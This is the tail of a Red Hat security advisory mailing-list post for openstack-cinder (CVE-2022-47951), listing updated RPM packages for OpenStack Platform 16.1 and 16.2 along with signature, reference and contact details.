noarch:  
openstack-cinder-12.0.10-27.el7ost.noarch.rpm  
python-cinder-12.0.10-27.el7ost.noarch.rpm

Red Hat OpenStack Platform 16.1:

Source:  
openstack-cinder-15.4.0-1.20230206163350.58f0e73.el8ost.src.rpm

noarch:  
openstack-cinder-15.4.0-1.20230206163350.58f0e73.el8ost.noarch.rpm  
python3-cinder-15.4.0-1.20230206163350.58f0e73.el8ost.noarch.rpm

Red Hat OpenStack Platform 16.2:

Source:  
openstack-cinder-15.6.1-2.20221003154726.87578a0.el8ost.src.rpm

noarch:  
openstack-cinder-15.6.1-2.20221003154726.87578a0.el8ost.noarch.rpm  
python3-cinder-15.6.1-2.20221003154726.87578a0.el8ost.noarch.rpm

Red Hat OpenStack Platform 16.1:

Source:  
openstack-cinder-15.4.0-1.20230206163350.58f0e73.el8ost.src.rpm

noarch:  
openstack-cinder-15.4.0-1.20230206163350.58f0e73.el8ost.noarch.rpm  
python3-cinder-15.4.0-1.20230206163350.58f0e73.el8ost.noarch.rpm

Red Hat OpenStack Platform 16.2:

Source:  
openstack-cinder-15.6.1-2.20221003154726.87578a0.el8ost.src.rpm

noarch:  
openstack-cinder-15.6.1-2.20221003154726.87578a0.el8ost.noarch.rpm  
python3-cinder-15.6.1-2.20221003154726.87578a0.el8ost.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-47951  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBI1Q9zjgjWX9erEAQgWHA//fDrcgA8DihNs3YVBif6Uom/9FjQADyGo  
69Sk7Cv171AEls5gqs0GZ+8Yu06+C1j9gpU0a1NsAje0blNeI7x3tKKWY9oNRhMa  
1brx1gbeRlzCCpGz4NHOmTX0Zime8cH90iGbkKYw3J8/uDzW0Sgxt6jhyxKaT6fr  
UvrPIzh8SvjJV/IhU0r3sHr2p70iVsDH/FrJUfJL+RzvJSxfQMbOqBwZ96LRcqaQ  
gLlGQ9ZVPIlFouOSjpWEA3vOae21aYBwdW6vg42sqLmQjUvNDfexmQCYC8N7DtHx  
H8/Ans6lxsdIpNnxTgX3sANSuESI7awjgaN0Bf+kPvGKVYCIIXadAbAssz0atl4N  
uJ4K7m/8SCbx6OZdWj+VmxwbtvirXEC8Ob2tDWF+Hpp0n45uWio0l7mbthYKQACz  
+0jJ9QkBLg6ujqbq90XeTZvPGXkKnIbdk2U2ovpNn0N788aMhxODwD0pzY5zn3lJ  
VkEvt3crqXjWRrLdOOpYFg27qlz4eXZyxQyLVgW6SUI9CQeOFk7yYvJCC44qK1JW  
0XdXvw/S0Eo3ozVjf6qU8/HCZIfsYrjbVI+VAFstE97UXIQw0tN0mNHvqyB9Sr9d  
5/8tg8LQx+pAhi6xYXsuQJyd19Zt/04HiG6SII250MaAaH575mgeocXqaFl3l6nU  
H5vEvvCYiaY=  
=loIU  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#js